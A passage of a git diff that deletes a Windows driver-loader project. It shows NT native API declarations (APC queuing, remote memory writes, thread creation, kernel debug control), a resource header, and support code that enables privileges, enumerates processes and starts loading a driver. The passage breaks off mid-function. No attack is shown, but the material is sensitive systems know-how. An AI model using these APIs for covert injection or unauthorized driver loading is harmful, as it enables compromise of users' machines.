-NTSTATUS -NTAPI -NtSetInformationThread( - _In_ HANDLE ThreadHandle, - _In_ THREADINFOCLASS ThreadInformationClass, - _In_reads_bytes_(ThreadInformationLength) PVOID ThreadInformation, - _In_ ULONG ThreadInformationLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryInformationProcess( - _In_ HANDLE ProcessHandle, - _In_ PROCESSINFOCLASS ProcessInformationClass, - _Out_writes_bytes_(ProcessInformationLength) PVOID ProcessInformation, - _In_ ULONG ProcessInformationLength, - _Out_opt_ PULONG ReturnLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtSetInformationProcess( - _In_ HANDLE ProcessHandle, - _In_ PROCESSINFOCLASS ProcessInformationClass, - _In_reads_bytes_(ProcessInformationLength) PVOID ProcessInformation, - _In_ ULONG ProcessInformationLength); - -typedef VOID(*PPS_APC_ROUTINE) ( - _In_opt_ PVOID ApcArgument1, - _In_opt_ PVOID ApcArgument2, - 
_In_opt_ PVOID ApcArgument3); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueueApcThread( - _In_ HANDLE ThreadHandle, - _In_ PPS_APC_ROUTINE ApcRoutine, - _In_opt_ PVOID ApcArgument1, - _In_opt_ PVOID ApcArgument2, - _In_opt_ PVOID ApcArgument3); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueueApcThreadEx( - _In_ HANDLE ThreadHandle, - _In_opt_ HANDLE UserApcReserveHandle, - _In_ PPS_APC_ROUTINE ApcRoutine, - _In_opt_ PVOID ApcArgument1, - _In_opt_ PVOID ApcArgument2, - _In_opt_ PVOID ApcArgument3); - -NTSYSAPI -NTSTATUS -NTAPI -NtYieldExecution( - VOID); - -NTSYSAPI -NTSTATUS -NTAPI -NtTestAlert( - VOID); - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateProcessEx( - _Out_ PHANDLE ProcessHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ HANDLE ParentProcess, - _In_ ULONG Flags, - _In_opt_ HANDLE SectionHandle, - _In_opt_ HANDLE DebugPort, - _In_opt_ HANDLE ExceptionPort, - _In_ BOOLEAN InJob); - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateThreadEx( - _Out_ PHANDLE hThread, - _In_ ACCESS_MASK DesiredAccess, - _In_ LPVOID ObjectAttributes, - _In_ HANDLE ProcessHandle, - _In_ LPTHREAD_START_ROUTINE lpStartAddress, - _In_ LPVOID lpParameter, - _In_ BOOL CreateSuspended, - _In_ DWORD StackZeroBits, - _In_ DWORD SizeOfStackCommit, - _In_ DWORD SizeOfStackReserve, - _Out_ LPVOID lpBytesBuffer); - -NTSYSAPI -ULONG -NTAPI -NtGetCurrentProcessorNumber( - VOID); - -/************************************************************************************ -* -* License API. -* -************************************************************************************/ - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryLicenseValue( - _In_ PUNICODE_STRING ValueName, - _Out_opt_ PULONG Type, - _Out_writes_bytes_to_opt_(DataSize, *ResultDataSize) PVOID Data, - _In_ ULONG DataSize, - _Out_ PULONG ResultDataSize); - -/************************************************************************************ -* -* Virtual Memory API. 
-* -************************************************************************************/ - -NTSYSAPI -NTSTATUS -NTAPI -NtAllocateVirtualMemory( - _In_ HANDLE ProcessHandle, - _Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID *BaseAddress, - _In_ ULONG_PTR ZeroBits, - _Inout_ PSIZE_T RegionSize, - _In_ ULONG AllocationType, - _In_ ULONG Protect); - -NTSYSAPI -NTSTATUS -NTAPI -NtFreeVirtualMemory( - _In_ HANDLE ProcessHandle, - _Inout_ PVOID *BaseAddress, - _Inout_ PSIZE_T RegionSize, - _In_ ULONG FreeType); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryVirtualMemory( - _In_ HANDLE ProcessHandle, - _In_opt_ PVOID BaseAddress, - _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass, - _Out_writes_bytes_(MemoryInformationLength) PVOID MemoryInformation, - _In_ SIZE_T MemoryInformationLength, - _Out_opt_ PSIZE_T ReturnLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtSetInformationVirtualMemory( - _In_ HANDLE ProcessHandle, - _In_ VIRTUAL_MEMORY_INFORMATION_CLASS VmInformationClass, - _In_ ULONG_PTR NumberOfEntries, - _In_reads_(NumberOfEntries) PMEMORY_RANGE_ENTRY VirtualAddresses, - _In_reads_bytes_(VmInformationLength) PVOID VmInformation, - _In_ ULONG VmInformationLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtReadVirtualMemory( - _In_ HANDLE ProcessHandle, - _In_opt_ PVOID BaseAddress, - _Out_writes_bytes_(BufferSize) PVOID Buffer, - _In_ SIZE_T BufferSize, - _Out_opt_ PSIZE_T NumberOfBytesRead); - -NTSYSAPI -NTSTATUS -NTAPI -NtWriteVirtualMemory( - _In_ HANDLE ProcessHandle, - _In_opt_ PVOID BaseAddress, - _In_reads_bytes_(BufferSize) PVOID Buffer, - _In_ SIZE_T BufferSize, - _Out_opt_ PSIZE_T NumberOfBytesWritten); - -NTSYSAPI -NTSTATUS -NTAPI -NtProtectVirtualMemory( - _In_ HANDLE ProcessHandle, - _Inout_ PVOID *BaseAddress, - _Inout_ PSIZE_T RegionSize, - _In_ ULONG NewProtect, - _Out_ PULONG OldProtect); - -NTSYSAPI -NTSTATUS -NTAPI -NtLockVirtualMemory( - _In_ HANDLE ProcessHandle, - _Inout_ PVOID 
*BaseAddress, - _Inout_ PSIZE_T RegionSize, - _In_ ULONG MapType); - -NTSYSAPI -NTSTATUS -NTAPI -NtUnlockVirtualMemory( - _In_ HANDLE ProcessHandle, - _Inout_ PVOID *BaseAddress, - _Inout_ PSIZE_T RegionSize, - _In_ ULONG MapType); - -NTSYSAPI -NTSTATUS -NTAPI -NtFlushInstructionCache( - _In_ HANDLE ProcessHandle, - _In_opt_ PVOID BaseAddress, - _In_ SIZE_T Length); - -NTSYSAPI -NTSTATUS -NTAPI -NtCreatePagingFile( - _In_ PUNICODE_STRING PageFileName, - _In_ PLARGE_INTEGER MinimumSize, - _In_ PLARGE_INTEGER MaximumSize, - _In_ ULONG Priority); - -/************************************************************************************ -* -* Port API. -* -************************************************************************************/ - -NTSYSAPI -NTSTATUS -NTAPI -NtCreatePort( - _Out_ PHANDLE PortHandle, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ ULONG MaxConnectionInfoLength, - _In_ ULONG MaxMessageLength, - _In_ ULONG MaxPoolUsage); - -NTSYSAPI -NTSTATUS -NTAPI -NtCompleteConnectPort( - _In_ HANDLE PortHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtListenPort( - _In_ HANDLE PortHandle, - _Out_ PPORT_MESSAGE ConnectionRequest); - -NTSYSAPI -NTSTATUS -NTAPI -NtReplyPort( - _In_ HANDLE PortHandle, - _In_ PPORT_MESSAGE ReplyMessage); - -NTSYSAPI -NTSTATUS -NTAPI -NtReplyWaitReplyPort( - _In_ HANDLE PortHandle, - _Inout_ PPORT_MESSAGE ReplyMessage); - -NTSYSAPI -NTSTATUS -NTAPI -NtRequestPort( - _In_ HANDLE PortHandle, - _In_ PPORT_MESSAGE RequestMessage); - -NTSYSAPI -NTSTATUS -NTAPI -NtRequestWaitReplyPort( - _In_ HANDLE PortHandle, - _In_ PPORT_MESSAGE RequestMessage, - _Out_ PPORT_MESSAGE ReplyMessage); - -NTSYSAPI -NTSTATUS -NTAPI -NtClosePort( - _In_ HANDLE PortHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtReplyWaitReceivePort( - _In_ HANDLE PortHandle, - _Out_opt_ PVOID *PortContext, - _In_opt_ PPORT_MESSAGE ReplyMessage, - _Out_ PPORT_MESSAGE ReceiveMessage); - -NTSYSAPI -NTSTATUS -NTAPI -NtWriteRequestData( - _In_ HANDLE PortHandle, - _In_ PPORT_MESSAGE 
Message, - _In_ ULONG DataEntryIndex, - _In_ PVOID Buffer, - _In_ ULONG BufferSize, - _Out_opt_ PULONG NumberOfBytesWritten); - -NTSYSAPI -NTSTATUS -NTAPI -NtReadRequestData( - _In_ HANDLE PortHandle, - _In_ PPORT_MESSAGE Message, - _In_ ULONG DataEntryIndex, - _Out_ PVOID Buffer, - _In_ ULONG BufferSize, - _Out_opt_ PULONG NumberOfBytesRead); - -NTSYSAPI -NTSTATUS -NTAPI -NtConnectPort( - _Out_ PHANDLE PortHandle, - _In_ PUNICODE_STRING PortName, - _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos, - _Inout_opt_ PPORT_VIEW ClientView, - _Out_opt_ PREMOTE_PORT_VIEW ServerView, - _Out_opt_ PULONG MaxMessageLength, - _Inout_opt_ PVOID ConnectionInformation, - _Inout_opt_ PULONG ConnectionInformationLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtAcceptConnectPort( - _Out_ PHANDLE PortHandle, - _In_opt_ PVOID PortContext, - _In_ PPORT_MESSAGE ConnectionRequest, - _In_ BOOLEAN AcceptConnection, - _Inout_opt_ PPORT_VIEW ServerView, - _Out_opt_ PREMOTE_PORT_VIEW ClientView); - -NTSYSAPI -NTSTATUS -NTAPI -NtSecureConnectPort( - _Out_ PHANDLE PortHandle, - _In_ PUNICODE_STRING PortName, - _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos, - _Inout_opt_ PPORT_VIEW ClientView, - _In_opt_ PSID RequiredServerSid, - _Inout_opt_ PREMOTE_PORT_VIEW ServerView, - _Out_opt_ PULONG MaxMessageLength, - _Inout_opt_ PVOID ConnectionInformation, - _Inout_opt_ PULONG ConnectionInformationLength); - -/************************************************************************************ -* -* Boot Management API. -* -************************************************************************************/ - -NTSYSAPI -NTSTATUS -NTAPI -NtEnumerateBootEntries( - _Out_writes_bytes_opt_(*BufferLength) PVOID Buffer, - _Inout_ PULONG BufferLength); - -/************************************************************************************ -* -* Reserve Objects API. 
-* -************************************************************************************/ - -typedef enum _MEMORY_RESERVE_TYPE { - MemoryReserveUserApc, - MemoryReserveIoCompletion, - MemoryReserveTypeMax -} MEMORY_RESERVE_TYPE; - -NTSYSAPI -NTSTATUS -NTAPI -NtAllocateReserveObject( - _Out_ PHANDLE MemoryReserveHandle, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ MEMORY_RESERVE_TYPE Type); - -/************************************************************************************ -* -* Debug API. -* -************************************************************************************/ - -// -// Define the debug object thats used to attatch to processes that are being debugged. -// -#define DEBUG_OBJECT_DELETE_PENDING (0x1) // Debug object is delete pending. -#define DEBUG_OBJECT_KILL_ON_CLOSE (0x2) // Kill all debugged processes on close - -typedef struct _DEBUG_OBJECT { - // - // Event thats set when the EventList is populated. - // - KEVENT EventsPresent; - // - // Mutex to protect the structure - // - FAST_MUTEX Mutex; - // - // Queue of events waiting for debugger intervention - // - LIST_ENTRY EventList; - // - // Flags for the object - // - ULONG Flags; -} DEBUG_OBJECT, *PDEBUG_OBJECT; - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateDebugObject( - _Out_ PHANDLE DebugObjectHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ ULONG Flags); - -NTSYSAPI -NTSTATUS -NTAPI -NtDebugActiveProcess( - _In_ HANDLE ProcessHandle, - _In_ HANDLE DebugObjectHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtRemoveProcessDebug( - _In_ HANDLE ProcessHandle, - _In_ HANDLE DebugObjectHandle); - -/************************************************************************************ -* -* Profile API. 
-* -************************************************************************************/ - -typedef enum _KPROFILE_SOURCE { - ProfileTime, - ProfileAlignmentFixup, - ProfileTotalIssues, - ProfilePipelineDry, - ProfileLoadInstructions, - ProfilePipelineFrozen, - ProfileBranchInstructions, - ProfileTotalNonissues, - ProfileDcacheMisses, - ProfileIcacheMisses, - ProfileCacheMisses, - ProfileBranchMispredictions, - ProfileStoreInstructions, - ProfileFpInstructions, - ProfileIntegerInstructions, - Profile2Issue, - Profile3Issue, - Profile4Issue, - ProfileSpecialInstructions, - ProfileTotalCycles, - ProfileIcacheIssues, - ProfileDcacheAccesses, - ProfileMemoryBarrierCycles, - ProfileLoadLinkedIssues, - ProfileMaximum -} KPROFILE_SOURCE; - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateProfile( - _Out_ PHANDLE ProfileHandle, - _In_opt_ HANDLE Process, - _In_ PVOID ProfileBase, - _In_ SIZE_T ProfileSize, - _In_ ULONG BucketSize, - _In_reads_bytes_(BufferSize) PULONG Buffer, - _In_ ULONG BufferSize, - _In_ KPROFILE_SOURCE ProfileSource, - _In_ KAFFINITY Affinity); - -NTSYSAPI -NTSTATUS -NTAPI -NtStartProfile( - _In_ HANDLE ProfileHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtStopProfile( - _In_ HANDLE ProfileHandle); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryIntervalProfile( - _In_ KPROFILE_SOURCE ProfileSource, - _Out_ PULONG Interval); - -NTSYSAPI -NTSTATUS -NTAPI -NtSetIntervalProfile( - _In_ ULONG Interval, - _In_ KPROFILE_SOURCE Source); - -/************************************************************************************ -* -* Worker Factory API. 
-* -************************************************************************************/ - -typedef enum _WORKERFACTORYINFOCLASS { - WorkerFactoryTimeout, - WorkerFactoryRetryTimeout, - WorkerFactoryIdleTimeout, - WorkerFactoryBindingCount, - WorkerFactoryThreadMinimum, - WorkerFactoryThreadMaximum, - WorkerFactoryPaused, - WorkerFactoryBasicInformation, - WorkerFactoryAdjustThreadGoal, - WorkerFactoryCallbackType, - WorkerFactoryStackInformation, - WorkerFactoryThreadBasePriority, - WorkerFactoryTimeoutWaiters, - WorkerFactoryFlags, - WorkerFactoryThreadSoftMaximum, - MaxWorkerFactoryInfoClass -} WORKERFACTORYINFOCLASS, *PWORKERFACTORYINFOCLASS; - -typedef struct _WORKER_FACTORY_BASIC_INFORMATION { - LARGE_INTEGER Timeout; - LARGE_INTEGER RetryTimeout; - LARGE_INTEGER IdleTimeout; - BOOLEAN Paused; - BOOLEAN TimerSet; - BOOLEAN QueuedToExWorker; - BOOLEAN MayCreate; - BOOLEAN CreateInProgress; - BOOLEAN InsertedIntoQueue; - BOOLEAN Shutdown; - ULONG BindingCount; - ULONG ThreadMinimum; - ULONG ThreadMaximum; - ULONG PendingWorkerCount; - ULONG WaitingWorkerCount; - ULONG TotalWorkerCount; - ULONG ReleaseCount; - LONGLONG InfiniteWaitGoal; - PVOID StartRoutine; - PVOID StartParameter; - HANDLE ProcessId; - SIZE_T StackReserve; - SIZE_T StackCommit; - NTSTATUS LastThreadCreationStatus; -} WORKER_FACTORY_BASIC_INFORMATION, *PWORKER_FACTORY_BASIC_INFORMATION; - -NTSYSAPI -NTSTATUS -NTAPI -NtCreateWorkerFactory( - _Out_ PHANDLE WorkerFactoryHandleReturn, - _In_ ACCESS_MASK DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_ HANDLE CompletionPortHandle, - _In_ HANDLE WorkerProcessHandle, - _In_ PVOID StartRoutine, - _In_opt_ PVOID StartParameter, - _In_opt_ ULONG MaxThreadCount, - _In_opt_ SIZE_T StackReserve, - _In_opt_ SIZE_T StackCommit); - -NTSYSAPI -NTSTATUS -NTAPI -NtQueryInformationWorkerFactory( - _In_ HANDLE WorkerFactoryHandle, - _In_ WORKERFACTORYINFOCLASS WorkerFactoryInformationClass, - _Out_writes_bytes_(WorkerFactoryInformationLength) 
PVOID WorkerFactoryInformation, - _In_ ULONG WorkerFactoryInformationLength, - _Out_opt_ PULONG ReturnLength); - -NTSYSAPI -NTSTATUS -NTAPI -NtShutdownWorkerFactory( - _In_ HANDLE WorkerFactoryHandle, - _Inout_ volatile LONG *PendingWorkerCount); - -NTSYSAPI -NTSTATUS -NTAPI -NtReleaseWorkerFactoryWorker( - _In_ HANDLE WorkerFactoryHandle); - -/************************************************************************************ -* -* Event Tracing API. -* -************************************************************************************/ - -NTSYSAPI -NTSTATUS -NTAPI -NtTraceEvent( - _In_ HANDLE TraceHandle, - _In_ ULONG Flags, - _In_ ULONG FieldSize, - _In_ PVOID Fields); - -NTSYSAPI -NTSTATUS -NTAPI -NtTraceControl( - _In_ ULONG FunctionCode, - _In_reads_bytes_opt_(InBufferLen) PVOID InBuffer, - _In_ ULONG InBufferLen, - _Out_writes_bytes_opt_(OutBufferLen) PVOID OutBuffer, - _In_ ULONG OutBufferLen, - _Out_ PULONG ReturnLength); - -/************************************************************************************ -* -* Kernel Debugger API. 
-* -************************************************************************************/ - -typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION { - BOOLEAN KernelDebuggerEnabled; - BOOLEAN KernelDebuggerNotPresent; -} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION; - -typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX { - BOOLEAN DebuggerAllowed; - BOOLEAN DebuggerEnabled; - BOOLEAN DebuggerPresent; -} SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION_EX; - -typedef enum _SYSDBG_COMMAND { - SysDbgQueryModuleInformation, - SysDbgQueryTraceInformation, - SysDbgSetTracepoint, - SysDbgSetSpecialCall, - SysDbgClearSpecialCalls, - SysDbgQuerySpecialCalls, - SysDbgBreakPoint, - SysDbgQueryVersion, - SysDbgReadVirtual, - SysDbgWriteVirtual, - SysDbgReadPhysical, - SysDbgWritePhysical, - SysDbgReadControlSpace, - SysDbgWriteControlSpace, - SysDbgReadIoSpace, - SysDbgWriteIoSpace, - SysDbgReadMsr, - SysDbgWriteMsr, - SysDbgReadBusData, - SysDbgWriteBusData, - SysDbgCheckLowMemory, - SysDbgEnableKernelDebugger, - SysDbgDisableKernelDebugger, - SysDbgGetAutoKdEnable, - SysDbgSetAutoKdEnable, - SysDbgGetPrintBufferSize, - SysDbgSetPrintBufferSize, - SysDbgGetKdUmExceptionEnable, - SysDbgSetKdUmExceptionEnable, - SysDbgGetTriageDump, - SysDbgGetKdBlockEnable, - SysDbgSetKdBlockEnable, - SysDbgRegisterForUmBreakInfo, - SysDbgGetUmBreakPid, - SysDbgClearUmBreakPid, - SysDbgGetUmAttachPid, - SysDbgClearUmAttachPid, - SysDbgGetLiveKernelDump -} SYSDBG_COMMAND, *PSYSDBG_COMMAND; - -typedef struct _SYSDBG_VIRTUAL { - PVOID Address; - PVOID Buffer; - ULONG Request; -} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL; - -NTSYSAPI -NTSTATUS -NTAPI -NtSystemDebugControl( - _In_ SYSDBG_COMMAND Command, - _Inout_updates_bytes_opt_(InputBufferLength) PVOID InputBuffer, - _In_ ULONG InputBufferLength, - _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer, - _In_ ULONG OutputBufferLength, - _Out_opt_ PULONG ReturnLength); - 
-/************************************************************************************ -* -* Application Verifier API and definitions. -* -************************************************************************************/ - -#ifndef DLL_PROCESS_VERIFIER -#define DLL_PROCESS_VERIFIER 4 -#endif - -typedef VOID(NTAPI *RTL_VERIFIER_DLL_LOAD_CALLBACK)( - PWSTR DllName, - PVOID DllBase, - SIZE_T DllSize, - PVOID Reserved); - -typedef VOID(NTAPI *RTL_VERIFIER_DLL_UNLOAD_CALLBACK)( - PWSTR DllName, - PVOID DllBase, - SIZE_T DllSize, - PVOID Reserved); - -typedef VOID(NTAPI *RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK)( - PVOID AllocationBase, - SIZE_T AllocationSize); - -typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR { - PCHAR ThunkName; - PVOID ThunkOldAddress; - PVOID ThunkNewAddress; -} RTL_VERIFIER_THUNK_DESCRIPTOR, *PRTL_VERIFIER_THUNK_DESCRIPTOR; - -typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR { - PWCHAR DllName; - DWORD DllFlags; - PVOID DllAddress; - PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks; -} RTL_VERIFIER_DLL_DESCRIPTOR, *PRTL_VERIFIER_DLL_DESCRIPTOR; - -typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR { - DWORD Length; - PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls; - RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback; - RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback; - PWSTR VerifierImage; - DWORD VerifierFlags; - DWORD VerifierDebug; - PVOID RtlpGetStackTraceAddress; - PVOID RtlpDebugPageHeapCreate; - PVOID RtlpDebugPageHeapDestroy; - RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback; -} RTL_VERIFIER_PROVIDER_DESCRIPTOR, *PRTL_VERIFIER_PROVIDER_DESCRIPTOR; - -// -// Application verifier standard flags. 
-// -#define RTL_VRF_FLG_FULL_PAGE_HEAP 0x00000001 -#define RTL_VRF_FLG_RESERVED_DONOTUSE 0x00000002 -#define RTL_VRF_FLG_HANDLE_CHECKS 0x00000004 -#define RTL_VRF_FLG_STACK_CHECKS 0x00000008 -#define RTL_VRF_FLG_APPCOMPAT_CHECKS 0x00000010 -#define RTL_VRF_FLG_TLS_CHECKS 0x00000020 -#define RTL_VRF_FLG_DIRTY_STACKS 0x00000040 -#define RTL_VRF_FLG_RPC_CHECKS 0x00000080 -#define RTL_VRF_FLG_COM_CHECKS 0x00000100 -#define RTL_VRF_FLG_DANGEROUS_APIS 0x00000200 -#define RTL_VRF_FLG_RACE_CHECKS 0x00000400 -#define RTL_VRF_FLG_DEADLOCK_CHECKS 0x00000800 -#define RTL_VRF_FLG_FIRST_CHANCE_EXCEPTION_CHECKS 0x00001000 -#define RTL_VRF_FLG_VIRTUAL_MEM_CHECKS 0x00002000 -#define RTL_VRF_FLG_ENABLE_LOGGING 0x00004000 -#define RTL_VRF_FLG_FAST_FILL_HEAP 0x00008000 -#define RTL_VRF_FLG_VIRTUAL_SPACE_TRACKING 0x00010000 -#define RTL_VRF_FLG_ENABLED_SYSTEM_WIDE 0x00020000 -#define RTL_VRF_FLG_MISCELLANEOUS_CHECKS 0x00020000 -#define RTL_VRF_FLG_LOCK_CHECKS 0x00040000 - -NTSYSAPI -VOID -NTAPI -RtlApplicationVerifierStop( - _In_ ULONG_PTR Code, - _In_ PSTR Message, - _In_ ULONG_PTR Param1, - _In_ PSTR Description1, - _In_ ULONG_PTR Param2, - _In_ PSTR Description2, - _In_ ULONG_PTR Param3, - _In_ PSTR Description3, - _In_ ULONG_PTR Param4, - _In_ PSTR Description4); - -#ifndef VERIFIER_STOP -#define VERIFIER_STOP(Code, Msg, P1, S1, P2, S2, P3, S3, P4, S4) { \ - RtlApplicationVerifierStop ((Code), \ - (Msg), \ - (ULONG_PTR)(P1),(S1), \ - (ULONG_PTR)(P2),(S2), \ - (ULONG_PTR)(P3),(S3), \ - (ULONG_PTR)(P4),(S4)); \ - } -#endif - - -// -// NTOS_RTL HEADER END -// - -#pragma warning(pop) - - -#ifdef __cplusplus -} -#endif - -#endif NTOS_RTL diff --git a/Source/Zekamashi/loader/resource.h b/Source/Zekamashi/loader/resource.h deleted file mode 100644 index 7ca31da..0000000 --- a/Source/Zekamashi/loader/resource.h +++ /dev/null 
@@ -1,14 +0,0 @@
-//{{NO_DEPENDENCIES}}
-// Microsoft Visual C++ generated include file.
-// Used by Resource.rc
-
-// Next default values for new objects
-//
-#ifdef APSTUDIO_INVOKED
-#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 101
-#define _APS_NEXT_COMMAND_VALUE 40001
-#define _APS_NEXT_CONTROL_VALUE 1001
-#define _APS_NEXT_SYMED_VALUE 101
-#endif
-#endif
diff --git a/Source/Zekamashi/loader/sup.c b/Source/Zekamashi/loader/sup.c
deleted file mode 100644
index 39b78fc..0000000
--- a/Source/Zekamashi/loader/sup.c
+++ /dev/null
@@ -1,349 +0,0 @@ -/******************************************************************************* -* -* (C) COPYRIGHT AUTHORS, 2014 - 2019 -* -* TITLE: SUP.C -* -* VERSION: 1.100 -* -* DATE: 04 Jan 2019 -* -* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF -* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED -* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A -* PARTICULAR PURPOSE. -* -*******************************************************************************/ -#include "global.h" - -/* -* supPurgeSystemCache -* -* Purpose: -* -* Flush file cache and memory standby list. -* -*/ -VOID supPurgeSystemCache( - VOID -) -{ - SYSTEM_FILECACHE_INFORMATION sfc; - SYSTEM_MEMORY_LIST_COMMAND smlc; - - //flush file system cache - if (supEnablePrivilege(SE_INCREASE_QUOTA_PRIVILEGE, TRUE)) { - RtlSecureZeroMemory(&sfc, sizeof(SYSTEM_FILECACHE_INFORMATION)); - sfc.MaximumWorkingSet = (SIZE_T)-1; - sfc.MinimumWorkingSet = (SIZE_T)-1; - NtSetSystemInformation(SystemFileCacheInformation, &sfc, sizeof(sfc)); - } - - //flush standby list - if (supEnablePrivilege(SE_PROF_SINGLE_PROCESS_PRIVILEGE, TRUE)) { - smlc = MemoryPurgeStandbyList; - NtSetSystemInformation(SystemMemoryListInformation, &smlc, sizeof(smlc)); - } -} - -/* -* supEnablePrivilege -* -* Purpose: -* -* Enable/Disable given privilege. -* -* Return FALSE on any error. -* -*/ -BOOL supEnablePrivilege( - _In_ DWORD PrivilegeName, - _In_ BOOL fEnable -) -{ - BOOL bResult = FALSE; - ULONG dummy; - NTSTATUS status; - HANDLE hToken; - TOKEN_PRIVILEGES TokenPrivileges; - - status = NtOpenProcessToken( - GetCurrentProcess(), - TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, - &hToken); - - if (!NT_SUCCESS(status)) { - return bResult; - } - - TokenPrivileges.PrivilegeCount = 1; - TokenPrivileges.Privileges[0].Luid.LowPart = PrivilegeName; - TokenPrivileges.Privileges[0].Luid.HighPart = 0; - TokenPrivileges.Privileges[0].Attributes = (fEnable) ? 
SE_PRIVILEGE_ENABLED : 0; - status = NtAdjustPrivilegesToken(hToken, FALSE, &TokenPrivileges, - sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, &dummy); - if (status == STATUS_NOT_ALL_ASSIGNED) { - status = STATUS_PRIVILEGE_NOT_HELD; - } - bResult = NT_SUCCESS(status); - NtClose(hToken); - return bResult; -} - - -/* -* supCopyMemory -* -* Purpose: -* -* Copies bytes between buffers. -* -* dest - Destination buffer -* cbdest - Destination buffer size in bytes -* src - Source buffer -* cbsrc - Source buffer size in bytes -* -*/ -void supCopyMemory( - _Inout_ void *dest, - _In_ size_t cbdest, - _In_ const void *src, - _In_ size_t cbsrc -) -{ - char *d = (char*)dest; - char *s = (char*)src; - - if ((dest == 0) || (src == 0) || (cbdest == 0)) - return; - if (cbdest < cbsrc) - cbsrc = cbdest; - - while (cbsrc > 0) { - *d++ = *s++; - cbsrc--; - } -} - -/* -* supGetSystemInfo -* -* Purpose: -* -* Returns buffer with system information by given InfoClass. -* -* Returned buffer must be freed with HeapFree after usage. -* Function will return error after 100 attempts. -* -*/ -PVOID supGetSystemInfo( - _In_ SYSTEM_INFORMATION_CLASS InfoClass -) -{ - INT c = 0; - PVOID Buffer = NULL; - HANDLE ProcessHeap = GetProcessHeap(); - ULONG Size = 0x1000; - NTSTATUS status; - ULONG memIO; - - do { - Buffer = HeapAlloc(ProcessHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size); - if (Buffer != NULL) { - status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO); - } - else { - return NULL; - } - if (status == STATUS_INFO_LENGTH_MISMATCH) { - HeapFree(ProcessHeap, 0, Buffer); - Buffer = NULL; - Size *= 2; - c++; - if (c > 100) { - status = STATUS_SECRET_TOO_LONG; - break; - } - } - } while (status == STATUS_INFO_LENGTH_MISMATCH); - - if (NT_SUCCESS(status)) { - return Buffer; - } - - if (Buffer) { - HeapFree(ProcessHeap, 0, Buffer); - } - return NULL; -} - -/* -* supProcessExist -* -* Purpose: -* -* Return TRUE if specified process launched, FALSE otherwise or on error. 
-* -*/ -BOOL supProcessExist( - _In_ LPWSTR lpProcessName -) -{ - BOOL cond = FALSE; - PSYSTEM_PROCESSES_INFORMATION ProcessList, pList; - UNICODE_STRING procName; - BOOL bResult = FALSE; - - ProcessList = (PSYSTEM_PROCESSES_INFORMATION)supGetSystemInfo(SystemProcessInformation); - if (ProcessList == NULL) { - return bResult; - } - - do { - RtlSecureZeroMemory(&procName, sizeof(procName)); - RtlInitUnicodeString(&procName, lpProcessName); - pList = ProcessList; - - for (;;) { - if (RtlEqualUnicodeString(&procName, &pList->ImageName, TRUE)) { - bResult = TRUE; - break; - } - if (pList->NextEntryDelta == 0) { - break; - } - pList = (PSYSTEM_PROCESSES_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta); - } - - } while (cond); - - HeapFree(GetProcessHeap(), 0, ProcessList); - return bResult; -} - -/* -* supLoadDeviceDriver -* -* Purpose: -* -* Load tsugumi.sys from current directory. -* -*/ -BOOL supLoadDeviceDriver( - VOID -) -{ - BOOL bResult = FALSE, bCond = FALSE; - SC_HANDLE schSCManager = NULL; - DWORD cch; - TCHAR szFile[MAX_PATH * 2], szLog[MAX_PATH * 3]; - - do { - - schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (schSCManager == NULL) - break; - - 